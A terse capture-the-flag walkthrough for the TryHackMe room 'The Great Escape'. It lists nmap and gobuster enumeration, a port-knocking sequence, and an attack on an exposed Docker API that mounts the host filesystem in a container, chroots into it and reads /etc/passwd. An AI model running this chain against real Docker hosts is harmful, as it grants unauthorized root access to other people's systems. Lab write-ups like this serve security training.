The Great Escape
Room Link: https://tryhackme.com/r/room/thegreatescape
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Its returning too much from 200 so we need to filter it out
Kali
gobuster -e dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard

Kali
Had to add .well-known to the wordlist, wasn't in any of Tryhackme's default wordlists
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/dirb/common.txt --wildcard -s"204,301,302,307,401,403"

None of this was working, try later.
Kali
dirb http://$VICTIM/.well-known -X .txt
Kali
curl http://$VICTIM/.well-known/security.txt
Kali
curl http://$VICTIM/api/fl46
Kali
curl http://$VICTIM/robots.txt









Kali
git clone https://github.com/grongor/knock.git
cd knock
./knock $VICTIM 42 1337 10420 6969 63000
nmap $VICTIM -p 2375

Kali
subl /etc/docker/daemon.json
daemon.json
{
"insecure-registries" : ["10.10.90.88:2375"]
}
Kali
sudo systemctl stop docker
Wait 30 seconds
Kali
sudo systemctl start docker
Kali
docker -H $VICTIM:2375 images
docker -H $VICTIM:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh
cat /etc/passwd


Last updated